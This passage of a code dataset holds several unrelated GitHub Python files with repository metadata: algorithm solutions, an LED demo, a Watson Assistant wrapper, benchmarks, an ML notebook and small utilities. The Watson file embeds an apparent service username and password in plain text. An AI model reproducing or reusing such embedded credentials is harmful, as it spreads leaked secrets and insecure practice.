the given directory path if it doesn't exist. Raises\n OSError if ensure is True and the directory creation failed.\n \n :param path: the path to create\n :param ensure: ensure the directory is created\n \"\"\"\n try:\n os.mkdir(path)\n print(\"Created directory: '%s'\" % path)\n except OSError:\n pass\n \n if ensure and not os.path.isdir(path):\n raise OSError(\"Failed to create the directory '%s'.\" % path)\n\ndef tail( f, window=20 ):\n \"\"\"Unix tail for python\n Taken from http://stackoverflow.com/a/136368/624900\n \"\"\"\n BUFSIZ = 1024\n f.seek(0, 2)\n bytes = f.tell()\n size = window\n block = -1\n data = []\n while size > 0 and bytes > 0:\n if (bytes - BUFSIZ > 0):\n # Seek back one whole BUFSIZ\n f.seek(block*BUFSIZ, 2)\n # read BUFFER\n data.append(f.read(BUFSIZ))\n else:\n # file too small, start from begining\n f.seek(0,0)\n # only read what was not read\n data.append(f.read(bytes))\n linesFound = data[-1].count('\\n')\n size -= linesFound\n bytes -= BUFSIZ\n block -= 1\n return '\\n'.join(''.join(data).splitlines()[-window:])\n","repo_name":"jterrace/js.js","sub_path":"builder/jsjs/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","stars":1078,"dataset":"github-code","pt":"53"} +{"seq_id":"12644833170","text":"# Date Completed: 1st July 2022\n# Problem Link: https://leetcode.com/problems/best-time-to-buy-and-sell-stock/\n# References:\n# 1. https://dxmahata.gitbooks.io/leetcode-python-solutions/content/best_time_to_buy_and_sell_stock.html\n\n###################################################\n# more efficient (copied from reference 1)\n###################################################\nclass Solution:\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n if len(prices) == 0:\n return 0\n else:\n max_profit = 0\n min_price = prices[0]\n for i in range(len(prices)):\n profit = prices[i] - min_price\n max_profit = max(profit, max_profit)\n min_price = min(min_price, prices[i])\n\n return max_profit\n\n########################\n# brute force method\n########################\n# class Solution:\n# def maxProfit(self, prices: List[int]) -> int:\n# index = None\n# maxProfit = 0\n# for x in range(len(prices)):\n# for y in range(x + 1, len(prices)):\n# if prices[y] - prices[x] > maxProfit:\n# maxProfit = prices[y] - prices[x]\n \n# return maxProfit","repo_name":"egzj/sdesheet","sub_path":"day01 ( Arrays )/stock_buy_and_sell.py","file_name":"stock_buy_and_sell.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27724935554","text":"# The RGB LED hardware is WS2813, which can be controlled by neopixel library.\n# from https://learn.adafruit.com/circuitpython-essentials/circuitpython-neopixel\n\n# Requires:\n# lib/neopixel.mpy\n\nimport time\nimport board\nimport neopixel\n\npixel_pin = board.GP3\nnum_pixels = 1\n\npixels = neopixel.NeoPixel(pixel_pin, num_pixels, brightness=0.3, auto_write=False)\n\nRED = (255, 0, 0)\nYELLOW = (255, 150, 0)\nGREEN = (0, 255, 0)\nCYAN = (0, 255, 255)\nBLUE = (0, 0, 255)\nPURPLE = (180, 0, 255)\n\nwhile True:\n pixels.fill(RED)\n pixels.show()\n time.sleep(1)\n pixels.fill(GREEN)\n pixels.show()\n time.sleep(1)\n pixels.fill(BLUE)\n pixels.show()\n time.sleep(1)\n","repo_name":"makezurich/makezurich-badge-2023-circuitpython","sub_path":"06-grove-starterkit/rgb/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"26879261482","text":"import json\r\nimport watson_developer_cloud, copy\r\nfrom time import gmtime, strftime\r\n\r\n\r\nassistant = watson_developer_cloud.AssistantV1\\\r\n(\r\n username=\"04f281dd-5038-4b53-a6ab-533cc717544f\",\r\n password=\"jo8vla8Otw2H\",\r\n version=\"2018-02-16\"\r\n)\r\n#workSpaceID\r\nw_id = 'dc846ce4-56c9-408f-a37c-9aef0a7daf91'\r\n\r\ndef createIntent(name):\r\n response = assistant.create_intent\\\r\n (\r\n workspace_id = w_id,\r\n intent = name\r\n )\r\n print(\"WATSON ASSISTANT CREATED INTENT \", name)\r\n\r\ndef getIntentList():\r\n response = assistant.list_intents\\\r\n (\r\n workspace_id=w_id\r\n )\r\n return response\r\ndef getIntent(name):\r\n response = assistant.get_intent\\\r\n (\r\n workspace_id = w_id,\r\n intent = name\r\n )\r\n return response\r\n\r\ndef add_utterance(text,intent):\r\n response = assistant.update_intent\\\r\n (\r\n workspace_id=w_id,\r\n intent=intent,\r\n new_examples=[\r\n {'text': text}\r\n ],\r\n new_description='Updated intent on' + str(strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\r\n )\r\n print(\"WATSON ASSISTANT ADDED UTTERANCE IN INTENT \", intent)\r\n\r\ndef deleteIntent(name):\r\n response = assistant.delete_intent\\\r\n (\r\n workspace_id = w_id,\r\n intent = name\r\n )\r\n print(\"WATSON ASSISTANT DELETED INTENT \", name)\r\n\r\n\r\ndef add_utterances(input,intent):\r\n phrases = []\r\n example = {\"text\": \"\"}\r\n for text in input:\r\n example[\"text\"]=text\r\n phrases.append(copy.deepcopy(example))\r\n response = assistant.update_intent \\\r\n (\r\n workspace_id=w_id,\r\n intent=intent,\r\n new_examples=phrases,\r\n new_description='Updated intent on' + str(strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\r\n )\r\n print(\"WATSON ASSISTANT ADDED UTTERANCES IN INTENT \", intent)\r\n\r\ndef resetApplication():\r\n intentList = getIntentList()\r\n intentList=intentList[\"intents\"]\r\n for intentObject in intentList:\r\n deleteIntent(intentObject[\"intent\"])\r\n print(\"WATSON ASSISTANT RESET DONE\")\r\n\r\ndef getPrediction(userInput):\r\n response = assistant.message\\\r\n (\r\n workspace_id=w_id,\r\n input={\r\n 'text': userInput\r\n }\r\n )\r\n return response\r\n","repo_name":"pkgishere/EmNLP_DEMO","sub_path":"WatsonAssistantIntent.py","file_name":"WatsonAssistantIntent.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34462801884","text":"\nimport sys\nimport os\nfrom ctypes import CDLL, c_int, c_void_p, c_float\nfrom numpy.ctypeslib import ndpointer\nimport numpy as np\n\ninterface_path = os.path.abspath('.')\n\nPWM2d_AMD_dll = CDLL(interface_path + '/cpp_src/HIP/PWM_hip.so')\n\nPWM2d_AMD = PWM2d_AMD_dll.extrapAndImag_amd_cu\nPWM2d_AMD.restype = c_void_p\nPWM2d_AMD.argtypes = [c_int, c_int, c_int, c_int,\n c_int, c_int, c_int,\n c_float, c_int, c_float, c_int,\n ndpointer( dtype=np.float32, flags=(\"C\",\"A\") ),\n ndpointer( dtype=np.float32, flags=(\"C\",\"A\") ),\n ndpointer( dtype=np.float32, flags=(\"C\",\"A\") ),\n ndpointer( dtype=np.complex64, flags=(\"C\",\"A\") ),\n ndpointer( dtype=np.complex64, flags=(\"C\",\"A\") ),\n ndpointer( dtype=np.float32, flags=(\"C\",\"A\") )]\n","repo_name":"ahadji05/imaging2D_PSPI","sub_path":"interface/interface_hip.py","file_name":"interface_hip.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12658826596","text":"import collections\nimport itertools\nimport math\nimport decimal\nimport bisect\ndef I(): return input()\ndef IS(): return input().split()\ndef II(): return int(input())\ndef IIS(): return map(int,input().split())\ndef LIIS(): return list(map(int,input().split()))\n##############################################################################\nn=II()\nR=[]\nG=[]\nB=[]\nfor i in range(n*2):\n a,c=input().split()\n if c==\"R\":\n R.append(int(a))\n elif c==\"B\":\n B.append(int(a))\n else:\n G.append(int(a))\nif len(R)%2==0 and len(B)%2==0:\n print(0)\n exit()\ndef solve(a,b):\n res=10**18\n for i in range(len(a)):\n ind=bisect.bisect_left(b,a[i])\n try:\n res=min(res,abs(a[i]-b[ind]))\n except:\n pass\n try:\n if ind>0:\n res=min(res,abs(a[i]-b[ind-1]))\n except:\n pass\n return res\nR.sort()\nB.sort()\nG.sort()\nif len(R)%2==1 and len(B)%2==1:\n print(min(solve(R,B),solve(G,R)+solve(B,G)))\n exit()\nelif len(G)%2==1 and len(B)%2==1:\n print(min(solve(G,B),solve(R,B)+solve(G,R)))\n exit()\nelif len(G)%2==1 and len(R)%2==1:\n print(min(solve(G,R),solve(R,B)+solve(G,B)))\n exit()\n","repo_name":"mono-0812/procon","sub_path":"atcoder.jp/arc121/arc121_b/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71683648487","text":"def input_to_codes(string):\n return [int(i) for i in string.split(',')]\n\n\ndef parse_op(c):\n parsed = f\"{c:05d}\"\n opcode = int(parsed[-2:])\n modes = [int(i) for i in parsed[0:3]]\n return modes + [opcode]\n\n\ndef get_value(mode, inp, memory):\n if mode == 0:\n return memory[inp]\n return inp\n\n\ndef run(codes, user_input):\n i = 0\n diagnostic = []\n if not hasattr(user_input, '__next__'):\n user_input = iter([user_input])\n while codes[i] != 99:\n _, mode2, mode1, opcode = parse_op(codes[i])\n d = codes[i + 3]\n\n # add\n if opcode == 1:\n a = get_value(mode1, codes[i + 1], codes)\n b = get_value(mode2, codes[i + 2], codes)\n codes[d] = a + b\n i += 4\n # multiply\n elif opcode == 2:\n a = get_value(mode1, codes[i + 1], codes)\n b = get_value(mode2, codes[i + 2], codes)\n codes[d] = a * b\n i += 4\n # provide input\n elif opcode == 3:\n try:\n codes[codes[i + 1]] = next(user_input)\n except StopIteration:\n return diagnostic and int(''.join(diagnostic)) or 0\n i += 2\n # output value\n elif opcode == 4:\n diagnostic.append(str(get_value(mode1, codes[i + 1], codes)))\n i += 2\n # jump if true\n elif opcode == 5:\n a = get_value(mode1, codes[i + 1], codes)\n b = get_value(mode2, codes[i + 2], codes)\n i = a and b or i + 3\n # jump if false\n elif opcode == 6:\n a = get_value(mode1, codes[i + 1], codes)\n b = get_value(mode2, codes[i + 2], codes)\n i = not a and b or i + 3\n # less than\n elif opcode == 7:\n a = get_value(mode1, codes[i + 1], codes)\n b = get_value(mode2, codes[i + 2], codes)\n codes[d] = a < b and 1 or 0\n i += 4\n # equal\n elif opcode == 8:\n a = get_value(mode1, codes[i + 1], codes)\n b = get_value(mode2, codes[i + 2], codes)\n codes[d] = a == b and 1 or 0\n i += 4\n\n val = int(''.join(diagnostic))\n print(val)\n return val\n","repo_name":"andyhoneycutt/advent-of-code","sub_path":"python/2019/intcode.py","file_name":"intcode.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20147689712","text":"# In this comparison we should compare:\n# 1. naive single-threaded NumPy\n# 2. MKL-accelerated NumPy\n# 3. CUDA-accelerated CuPy\n# 4. CUDA and Tensor Cores-accelerated CuPy\n# 5. JAX multi-gpu\n#\n# Workloads:\n# * generating big random matrix\n# * multiplying big matrices\n# * moving average computation\n# * generating big random matrix\n#\n# Difference between CuPy and NumPy:\n# https://docs.cupy.dev/en/stable/user_guide/difference.html\n\nimport logging\nimport os\nimport pathlib\nfrom dataclasses import dataclass\nfrom sys import argv\nfrom typing import Generator, Optional, List\nimport numpy.distutils.system_info as sysinfo\n\n\nfrom shared import Bench, run_persisted_benchmarks\n\n\ndef benchmarks_for_backend(class_: type, class_name: str, size: int, **kwargs) -> Generator[Bench, None, None]:\n\n funcs = [\n ('Generate', lambda: globals().update({'m': class_(side=size, **kwargs)})),\n ('Matrix Multiply', lambda: globals()['m'].matrix_multiply()),\n ('Moving Averages', lambda: globals()['m'].moving_average()),\n ('Pearson Correlation', lambda: globals()['m'].pearson_correlations()),\n ('2D FFT', lambda: globals()['m'].fft2d()),\n ('Matrix SVD', lambda: globals()['m'].singular_decomposition()),\n ('Array Median', lambda: globals()['m'].flat_median()),\n ('Array Sorting', lambda: globals()['m'].flat_sort()),\n ('Array Summation', lambda: globals()['m'].flat_sum()),\n ]\n\n for func_name, func in funcs:\n yield Bench(\n operation=func_name,\n backend=class_name,\n dataset=f'{size}x{size}',\n dataset_bytes=(size ** 2)*4,\n func=func,\n )\n\n\ndef benchmarks_for_sizes(class_: type, class_name: str, side_sizes: List[int], **kwargs) -> Generator[Bench, None, None]:\n for size in side_sizes:\n yield from benchmarks_for_backend(class_, class_name, size, **kwargs)\n\n\ndef available_benchmarks(\n cuda_device: int = 0,\n logger: logging.Logger = logging.getLogger(),\n) -> Generator[Bench, None, None]:\n\n # Swap the backend, if GPU is selected\n sizes = [512 * 2**i for i in range(0, 6)]\n\n try:\n import cupy\n cuda_device = int(cuda_device)\n if 'CUPY_ACCELERATORS' not in os.environ.keys():\n os.environ['CUPY_ACCELERATORS'] = \"cub,cutensor\"\n if 'CUPY_TF32' not in os.environ.keys():\n os.environ['CUPY_TF32'] = '1'\n\n devices = cupy.cuda.runtime.getDeviceCount()\n assert devices > 0, 'No CUDA-powered device found'\n logger.info('Found {} CUDA devices'.format(devices))\n\n cupy.cuda.runtime.setDevice(cuda_device)\n specs = cupy.cuda.runtime.getDeviceProperties(cuda_device)\n name = specs['name'].decode()\n logger.info('Using CuPy with : {}'.format(name))\n\n from via_cupy import ViaCuPy\n yield from benchmarks_for_sizes(ViaCuPy, 'CuPy', sizes)\n except ModuleNotFoundError:\n logger.info('CuPy not found, skipping')\n\n try:\n import torch\n logger.info(f'Using Torch with : {torch.cuda.get_device_name()}')\n\n from via_torch import ViaTorch\n yield from benchmarks_for_sizes(ViaTorch, 'Torch', sizes)\n except ModuleNotFoundError:\n logger.info('Torch not found, skipping')\n \n try:\n os.environ['XLA_PYTHON_CLIENT_PREALLOCATE']='false'\n import jax\n logger.info(f'Using JAX with : {jax.devices()}')\n\n from via_jax import ViaJAX\n yield from benchmarks_for_sizes(ViaJAX, f'JAX/{jax.device_count()}', sizes, device_count=jax.device_count())\n yield from benchmarks_for_sizes(ViaJAX, 'JAX/1', sizes, device_count=1)\n except ModuleNotFoundError:\n logger.info('JAX not found, skipping')\n\n try:\n import numpy as np\n libs = set(sysinfo.get_info('blas')['libraries'])\n libs_str = ','.join(libs)\n logger.info(f'Using NumPy with BLAS versions: {libs_str}')\n\n from via_numpy import ViaNumPy\n yield from benchmarks_for_sizes(ViaNumPy, 'NumPy', sizes)\n except ModuleNotFoundError:\n logger.info('NumPy not found, skipping')\n\n\nif __name__ == '__main__':\n benches = list(available_benchmarks())\n backends = {x.backend for x in benches}\n datasets = {x.dataset for x in benches}\n results_path = os.path.join(\n pathlib.Path(__file__).resolve().parent,\n 'report/results.json'\n )\n\n print('Available backends: ', backends)\n print('Available datasets: ', datasets)\n run_persisted_benchmarks(benches, 10, results_path)\n","repo_name":"unum-cloud/udsb","sub_path":"matrix/bench.py","file_name":"bench.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"5830049080","text":"import random\nimport math\nimport typing\nfrom typing import Any\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom torch.utils.data import Dataset, DataLoader, ConcatDataset\n\nfrom models.base import BaseDataset\n\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, d_model, max_len, dropout=0.1):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n pe = torch.zeros(max_len, d_model) # 64*512\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1) # 64*1\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model)) # 256 model/2\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0) # 1*max_len*d_model\n self.register_buffer(\"pe\", pe)\n\n def forward(self, x): # [batch,seq,d_model]\n x = x + Variable(self.pe[:, : x.size(1)], requires_grad=False)\n return self.dropout(x)\n\n\nclass AbsolutePositionalEncoding(nn.Module):\n def __init__(self, hidden_size, max_len) -> None:\n super().__init__()\n self.pos_embed = nn.Parameter(torch.zeros(1, max_len, hidden_size))\n nn.init.kaiming_normal_(self.pos_embed)\n\n def forward(self, x):\n x += self.pos_embed.expand(x.shape[0], -1, -1)\n return x\n\n\n\nclass GlobalAveragePooling1D(nn.Module):\n def __init__(self, dim):\n super().__init__()\n self.dim = dim\n\n def forward(self, x):\n # x shape: [batch_size, seq_len, channels]\n x = torch.mean(x, dim=self.dim)\n return x\n\n\ndef sliding_window(seq, window_size, stride):\n result = []\n if window_size > len(seq):\n return [seq]\n for i in range(0, len(seq) - window_size + 1, stride):\n subseq = seq[i : i + window_size]\n result.append(subseq)\n return result\n\n\nclass TransformerBlock(nn.Module):\n def __init__(self, embed_dim, num_heads, ff_dim, dropout_rate=0.1):\n super(TransformerBlock, self).__init__()\n self.att = nn.MultiheadAttention(embed_dim, num_heads, dropout=0.1, batch_first=True)\n self.ffn = nn.Sequential(nn.Linear(embed_dim, ff_dim), nn.ReLU(), nn.Linear(ff_dim, embed_dim))\n self.layernorm1 = nn.LayerNorm(embed_dim)\n self.layernorm2 = nn.LayerNorm(embed_dim)\n self.dropout1 = nn.Dropout(dropout_rate)\n self.dropout2 = nn.Dropout(dropout_rate)\n\n def forward(self, inputs):\n attn_output = self.att(inputs, inputs, inputs)[0]\n # print(len(attn_output))\n attn_output = self.dropout1(attn_output)\n out1 = self.layernorm1(inputs + attn_output)\n ffn_output = self.ffn(out1)\n ffn_output = self.dropout2(ffn_output)\n return self.layernorm2(out1 + ffn_output)\n\n\ndef get_data_loader(\n filenames: typing.Iterable,\n dateset_cls=BaseDataset,\n truncation=None,\n batch_size=32,\n shuffle=True,\n num_workers=2,\n promoter_embedding=None,\n):\n train_filename, valid_filename, test_filename = filenames\n test_dateset = dateset_cls(\n test_filename,\n truncation=truncation,\n promoter_embedding=promoter_embedding,\n )\n valid_dataset = dateset_cls(\n valid_filename,\n truncation=truncation,\n promoter_embedding=promoter_embedding,\n )\n\n return (\n DataLoader(\n dateset_cls(train_filename, truncation=truncation, promoter_embedding=promoter_embedding),\n batch_size,\n shuffle,\n num_workers=num_workers,\n persistent_workers=True,\n pin_memory=True,\n drop_last=True,\n prefetch_factor=10,\n ),\n DataLoader(\n valid_dataset,\n batch_size,\n shuffle,\n num_workers=num_workers,\n persistent_workers=True,\n pin_memory=True,\n ),\n DataLoader(\n test_dateset,\n batch_size,\n shuffle,\n num_workers=num_workers,\n persistent_workers=True,\n pin_memory=True,\n ),\n )\n\n\ndef load_submodel(model, state_dict, state_dict_submodel_name, model_submodel_name):\n submodel_state_dict = {\n k.replace(state_dict_submodel_name + \".\", \"\"): v\n for k, v in state_dict.items()\n if k.startswith(state_dict_submodel_name)\n }\n attr = getattr(model, model_submodel_name)\n if hasattr(attr, \"load_state_dict\"):\n attr.load_state_dict(submodel_state_dict)\n else:\n # print(type(attr), type(submodel_state_dict))\n # print(submodel_state_dict)\n attr.data = submodel_state_dict[state_dict_submodel_name]","repo_name":"doveppp/MultimodalExpression","sub_path":"models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10148556205","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ### Imports\n\n# In[26]:\n\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom keras import layers, Input, Model\nfrom keras.callbacks import ModelCheckpoint, ReduceLROnPlateau\n\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\n\n\n# ### Loading data\n\n# In[27]:\n\n\ndata_dir = '../input/'\n\n# In[28]:\n\n\ntrain_raw = pd.read_csv(f'{data_dir}train.csv')\ntrain_raw.head()\n\n# In[29]:\n\n\ntest_raw = pd.read_csv(f'{data_dir}test.csv')\ntest_raw.head()\n\n# In[30]:\n\n\ntrain_raw.shape, test_raw.shape\n\n# In[31]:\n\n\ntrain_raw.isnull().sum().sum(), test_raw.isnull().sum().sum()\n\n# So there are no missing values in either training or test set.\n\n# ### Target distribution\n\n# In[32]:\n\n\nsns.countplot(train_raw.target)\nplt.show()\n\n# In[33]:\n\n\ntrain_raw.target.value_counts()\n\n# Looks like class labels are uniformly distributed in training data.\n\n# ### Train-validation split\n# \n# Let's split our training set such that 15% of data are used for validation -\n\n# In[34]:\n\n\ntrn_x, valid_x, trn_y, valid_y = train_test_split(train_raw.drop(['id', 'target'], axis=1), train_raw.target, random_state=33, test_size=0.15)\ntrn_x.shape, valid_x.shape, trn_y.shape, valid_y.shape\n\n# ### Categorical Feature\n\n# In[35]:\n\n\ntrn_wheezy = pd.get_dummies(trn_x['wheezy-copper-turtle-magic'])\nvalid_wheezy = pd.get_dummies(valid_x['wheezy-copper-turtle-magic'])\ntest_wheezy = pd.get_dummies(test_raw['wheezy-copper-turtle-magic'])\n\ntrn_wheezy.shape, valid_wheezy.shape, test_wheezy.shape\n\n# In[36]:\n\n\ntrn_x.drop('wheezy-copper-turtle-magic', axis=1, inplace=True)\nvalid_x.drop('wheezy-copper-turtle-magic', axis=1, inplace=True)\ntest_raw.drop('wheezy-copper-turtle-magic', axis=1, inplace=True)\n\n# ### Normalize features\n\n# In[37]:\n\n\nsc = StandardScaler()\ntrn_x = sc.fit_transform(trn_x)\n\nvalid_x = sc.transform(valid_x)\ntest_x = sc.transform(test_raw.drop('id', axis=1))\n\n# In[38]:\n\n\ntrn_x = np.concatenate([trn_x, trn_wheezy.values], axis=1)\nvalid_x = np.concatenate([valid_x, valid_wheezy.values], axis=1)\ntest_x = np.concatenate([test_x, test_wheezy.values], axis=1)\n\n# ### Model\n\n# In[39]:\n\n\ndef build_model():\n inp = Input(shape=(trn_x.shape[1],), name='input')\n x = layers.Dense(1000, activation='relu')(inp)\n x = layers.Dropout(0.65)(x)\n x = layers.Dense(750, activation='relu')(x)\n x = layers.Dropout(0.65)(x)\n x = layers.Dense(500, activation='relu')(x)\n x = layers.Dropout(0.6)(x)\n x = layers.Dense(1, activation='sigmoid')(x)\n \n model = Model(inp, x)\n model.compile(optimizer='adam',\n loss='binary_crossentropy', metrics=['acc'])\n \n return model\n\nmodel = build_model()\nmodel.summary()\n\n# ### Training\n\n# In[40]:\n\n\nweights_path = f'weights.best.hdf5'\nval_loss_checkpoint = ModelCheckpoint(weights_path, monitor='val_loss', verbose=1, save_best_only=True, mode='min')\nreduceLR = ReduceLROnPlateau(monitor='val_loss', patience=5, verbose=1, mode='min', min_lr=1e-6)\n\n# In[41]:\n\n\nmodel.fit(trn_x, trn_y, epochs=80, validation_data=(valid_x, valid_y),\n callbacks=[val_loss_checkpoint, reduceLR], batch_size=512, verbose=1)\n\n# In[43]:\n\n\nmodel.load_weights(weights_path)\n\n# ### roc_auc_score on validation data\n\n# In[44]:\n\n\nval_preds = model.predict(valid_x, batch_size=2048, verbose=1)\n\n# In[45]:\n\n\nroc_auc_score(valid_y.values, val_preds.reshape(-1))\n\n# ### Prediction on test data\n\n# In[46]:\n\n\ntest_preds = model.predict(test_x, batch_size=2048, verbose=1)\n\n# In[47]:\n\n\nsub_df = pd.read_csv(f'{data_dir}sample_submission.csv')\nsub_df.target = test_preds.reshape(-1)\nsub_df.head()\n\n# In[48]:\n\n\nsub_df.to_csv('solution.csv', index=False)\n","repo_name":"tetherless-world/CodeGraph","sub_path":"kaggle/python_files/sample949.py","file_name":"sample949.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11199361668","text":"import requests\nimport json\n\ndef check(id, point, expiry, yyyymmddhhmmss):\n token = f'{id}${expiry}${yyyymmddhhmmss}'\n vo = {\n 'user_id': id,\n 'point': int(point),\n 'token': token,\n 'memo': '테스트 포인트 차감'\n }\n\n header = {\n \"Content-Type\": \"application/json; charset=utf-8\"\n }\n\n response = requests.post(\"http://127.0.0.1:5000/token/check\", data=json.dumps(vo), headers=header,\n timeout=40)\n print(response.content)\n print(response.json())\n return response.json()\n","repo_name":"gkwlsdn17/StorePaymentSystem","sub_path":"SPS/app/module/token_check.py","file_name":"token_check.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2680581009","text":"\nimport numpy as np\nfrom .feature import Feature\nfrom .schedule import Always\n\n\nclass Strategy:\n def __init__(self, name, features=None, algo=None, schedule=None):\n self.name = name\n self.features = features # type: List[Feature]\n self.recursive_features = []\n self.discrete_features = []\n self.algo = algo\n self.schedule = schedule\n self.lookback = 0\n self.epoch = 0\n self.input = {}\n self.tickers = None\n\n def setup(self, tickers):\n self.tickers = tickers\n\n # setup algo\n self.algo.setup(tickers, self.features)\n\n # setup schedule\n if self.schedule is None:\n self.schedule = Always()\n\n # setup regular data\n self.input['time'] = np.empty(0, dtype='datetime64[ns]')\n self.input['close'] = np.empty((0, len(tickers)))\n\n # setup feature data\n if self.features is not None:\n self.lookback = max([x.lookback for x in self.features])\n for feature in self.features:\n self.input[feature.name] = feature\n\n if feature.is_recursive:\n self.recursive_features.append(feature)\n else:\n self.discrete_features.append(feature)\n\n return self\n\n def __call__(self, datum):\n \"\"\"\n Returns relative weight\n\n :param datum:\n :return:\n \"\"\"\n # update regular data\n self.input['time'] = np.append(self.input['time'], datum[0])\n self.input['close'] = self.append_data(self.input['close'], datum[1]['close'])\n\n # only recursive needed updating every bar\n for feature in self.recursive_features:\n feature(self.input)\n\n # calculate weight\n weights = None # None weight means no change\n if self.epoch > self.lookback and self.schedule(datum[0]):\n # update features\n for feature in self.discrete_features:\n feature(self.input)\n weights = self.algo(self.input) # input has references to features\n self.epoch += 1\n return weights\n\n def append_data(self, data, datum):\n return np.append(data[-self.lookback:], [datum], axis=0)\n","repo_name":"albertium/AlgoTrader","sub_path":"at/strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30903883400","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('editor', '0004_convert_endnotes'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='bookversion',\n name='track_changes',\n field=models.BooleanField(default=False),\n preserve_default=True,\n ),\n ]\n","repo_name":"booktype/Booktype","sub_path":"lib/booki/editor/migrations/0005_bookversion_track_changes.py","file_name":"0005_bookversion_track_changes.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":894,"dataset":"github-code","pt":"53"} +{"seq_id":"8778211137","text":"import torch\nfrom torchvision import datasets as ds\nimport torch.nn as nn\nimport torch.nn.functional as fn\nimport torch.optim as optim\nfrom torch.utils.data import Dataset, DataLoader\nfrom Processing import *\n\nMNIST_ds = ds.MNIST(\"\", train=True, download=True)\n\ninputSize = 3 * 16\noutputSize = 10\n\nclass NumberDet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.input = nn.Linear(inputSize, 32)\n self.hidden = nn.Linear(32, 16)\n self.output = nn.Linear(16, outputSize)\n\n def forward(self, x):\n x = fn.relu(self.input(x))\n x = fn.relu(self.hidden(x))\n x = self.output(x)\n return x\n\nif __name__ == '__main__':\n splited_data = []\n for i in range(60000):\n splited_data.append(splitImage(MNIST_ds.data[i]))\n\n train_data = []\n for i in range(60000):\n features = []\n for item in splited_data[i]:\n features.append(processItem(item))\n train_data.append((torch.tensor(features), MNIST_ds[i][1]))\n print(\"Sample n°\", i, \" done!\")\n\n myNN = NumberDet()\n loss = nn.CrossEntropyLoss()\n optimizer = optim.Adam(myNN.parameters(), lr=0.002)\n epochs = 20\n\n train_ds, validation_ds = torch.utils.data.random_split(train_data, [50000, 10000])\n loaderTrain, loaderValidation = DataLoader(train_ds, batch_size=24), DataLoader(validation_ds, batch_size=24)\n # Boucle d'apprentissage\n for epoch in range(epochs):\n myNN.train()\n for features in loaderTrain:\n data, label = features\n output = myNN(data.float().view(-1, 48))\n cost = loss(output, label)\n myNN.zero_grad()\n cost.backward()\n optimizer.step()\n\n # Validation\n valid_loss, correct = 0, 0\n myNN.eval()\n for features in loaderValidation:\n data, label = features\n output = myNN(data.float().view(-1, 48))\n cost = loss(output, label)\n valid_loss += cost.item()\n correct += torch.sum(torch.argmax(output, dim=1) == label).item()\n valid_loss /= len(loaderValidation)\n correct /= len(loaderValidation.dataset)\n\n print(f\"epoch: {epoch + 1}, validation loss: {valid_loss:.4f}, correct predictions: {correct * 100:.2f}%\")\n\n torch.save(myNN.state_dict(), \"Prediction_Model.pth\")","repo_name":"Rd-Massou/Projet_IA","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72957369449","text":"from typing import TYPE_CHECKING, Optional\n\nfrom comitup import config, nm\n\nif TYPE_CHECKING:\n import NetworkManager\n\nSINGLE_MODE: str = \"single\"\nMULTI_MODE: str = \"router\"\n\nCONF_PATH: str = \"/etc/comitup.conf\"\n\nap_device: Optional[\"NetworkManager.Device\"] = None\nlink_device: Optional[\"NetworkManager.Device\"] = None\n\n\ndef get_conf() -> config.Config:\n (conf, _) = config.load_data()\n return conf\n\n\ndef dual_enabled() -> bool:\n return get_conf().getboolean(\"enable_appliance_mode\")\n\n\ndef get_mode() -> str:\n if 